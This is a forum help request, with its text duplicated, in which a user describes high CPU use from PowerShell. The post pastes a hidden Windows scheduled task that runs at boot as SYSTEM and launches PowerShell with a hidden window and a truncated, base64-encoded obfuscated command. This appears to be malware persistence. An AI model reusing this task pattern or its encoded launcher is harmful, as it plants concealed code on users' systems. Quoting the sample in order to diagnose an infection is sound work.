Y
YudiEdwan
Hi all,
i need your help about this,
it started last week when suddenly some of my apps like chrome or steam just crashed out of nowhere,
when i check in task manager, it turns out that my cpu usage is almost at 100% -around 70-85%- even though i'm not opening many tabs or playing games and most of the cpu usage is from powershell.exe.
skip all the things i've been through
finally i found what started the powershell.exe everytime i logged on,
it comes from task scheduler with some unknown task to running some script that not clear for what purpose
here's the xml of the task schedule event
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<RegistrationInfo />
<Triggers>
<BootTrigger>
<Enabled>true</Enabled>
</BootTrigger>
</Triggers>
<Principals>
<Principal id="Author">
<UserId>S-1-5-18</UserId>
<RunLevel>LeastPrivilege</RunLevel>
</Principal>
</Principals>
<Settings>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
<AllowHardTerminate>true</AllowHardTerminate>
<StartWhenAvailable>false</StartWhenAvailable>
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings>
<Duration>PT10M</Duration>
<WaitTimeout>PT1H</WaitTimeout>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand>
<Enabled>false</Enabled>
<Hidden>true</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle>
<WakeToRun>false</WakeToRun>
<ExecutionTimeLimit>PT72H</ExecutionTimeLimit>
<Priority>6</Priority>
</Settings>
<Actions Context="Author">
<Exec>
<Command>C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe</Command>
<Arguments>-NonInteractive -WindowStyle Hidden -EncodedCommand JAB2AHUAcQB5AE0AagBsAFcAQwBxACAAPQAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUwBoAGUAbABsACIAOwAkAHcAVgBvAEQASQBXAGIAIAA9ACAAIgB7AEYAQQBBADAANwA5ADQARAAtADYAMAA2AEYALQA1ADgARQBCAC0ANgAwAEQAQQBBADEANABFADAAOQAyADMAQgBFADMANQB9ACIAOwBmAHUAbgBjAHQAaQBvAG4AIABPAFgAcwBjAEYAewBQAGEAcgBhAG0AKABbAE8AdQB0AHAAdQB0AFQAeQBwAGUAKABbAFQAeQBwAGUAXQApAF0AWwBQAGEAcgBhAG0AZQB0AGUAcgAoACAAUABvAHMAaQB0AGkAbwBuACAAPQAgADAAKQBdAFsAVAB5AHAAZQBbAF0AXQAkAFMAdQB1AFAANQBIACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAeQBwAGUAWwBdACgAMAApACkALABbAFAAYQByAGEAbQBlAHQAZQByACgAIABQAG</Arguments>
</Exec>
</Actions>
</Task>
I already tried to delete from task scheduler, disabled it, and also delete from windows/system32/task/***
but it suddenly active again without i know what created it
sorry for my broken english
any suggestions are welcome, thanks in advance
Best Regards,
Edwan
Continue reading...
i need your help about this,
it started last week when suddenly some of my apps like chrome or steam just crashed out of nowhere,
when i check in task manager, it turns out that my cpu usage is almost at 100% -around 70-85%- even though i'm not opening many tabs or playing games and most of the cpu usage is from powershell.exe.
skip all the things i've been through
finally i found what started the powershell.exe everytime i logged on,
it comes from task scheduler with some unknown task to running some script that not clear for what purpose
here's the xml of the task schedule event
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<RegistrationInfo />
<Triggers>
<BootTrigger>
<Enabled>true</Enabled>
</BootTrigger>
</Triggers>
<Principals>
<Principal id="Author">
<UserId>S-1-5-18</UserId>
<RunLevel>LeastPrivilege</RunLevel>
</Principal>
</Principals>
<Settings>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
<AllowHardTerminate>true</AllowHardTerminate>
<StartWhenAvailable>false</StartWhenAvailable>
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings>
<Duration>PT10M</Duration>
<WaitTimeout>PT1H</WaitTimeout>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand>
<Enabled>false</Enabled>
<Hidden>true</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle>
<WakeToRun>false</WakeToRun>
<ExecutionTimeLimit>PT72H</ExecutionTimeLimit>
<Priority>6</Priority>
</Settings>
<Actions Context="Author">
<Exec>
<Command>C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe</Command>
<Arguments>-NonInteractive -WindowStyle Hidden -EncodedCommand JAB2AHUAcQB5AE0AagBsAFcAQwBxACAAPQAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUwBoAGUAbABsACIAOwAkAHcAVgBvAEQASQBXAGIAIAA9ACAAIgB7AEYAQQBBADAANwA5ADQARAAtADYAMAA2AEYALQA1ADgARQBCAC0ANgAwAEQAQQBBADEANABFADAAOQAyADMAQgBFADMANQB9ACIAOwBmAHUAbgBjAHQAaQBvAG4AIABPAFgAcwBjAEYAewBQAGEAcgBhAG0AKABbAE8AdQB0AHAAdQB0AFQAeQBwAGUAKABbAFQAeQBwAGUAXQApAF0AWwBQAGEAcgBhAG0AZQB0AGUAcgAoACAAUABvAHMAaQB0AGkAbwBuACAAPQAgADAAKQBdAFsAVAB5AHAAZQBbAF0AXQAkAFMAdQB1AFAANQBIACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAeQBwAGUAWwBdACgAMAApACkALABbAFAAYQByAGEAbQBlAHQAZQByACgAIABQAG</Arguments>
</Exec>
</Actions>
</Task>
I already tried to delete from task scheduler, disabled it, and also delete from windows/system32/task/***
but it suddenly active again without i know what created it
sorry for my broken english
any suggestions are welcome, thanks in advance
Best Regards,
Edwan
Continue reading...